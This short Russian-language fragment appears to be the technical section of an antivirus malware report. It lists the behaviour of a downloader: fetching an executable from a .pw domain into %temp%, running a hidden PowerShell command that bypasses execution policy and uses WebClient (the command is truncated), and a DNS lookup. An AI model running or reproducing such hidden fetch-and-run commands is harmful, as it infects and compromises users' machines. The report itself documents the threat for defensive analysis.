Техническая информация
- http://w25k8hbe04sq.pw/blog/w2eezcfue85y.exe как %temp%\benelux.exe
- '<SYSTEM32>\cmd.exe' /c cd CatherwoodargoncotangentbandpassneuroanotomyalcoholribbondatumMalagasymessiah & PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient...
- DNS ASK w2###hbe04sq.pw
- '<SYSTEM32>\cmd.exe' /c cd CatherwoodargoncotangentbandpassneuroanotomyalcoholribbondatumMalagasymessiah & PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient...' (со скрытым окном)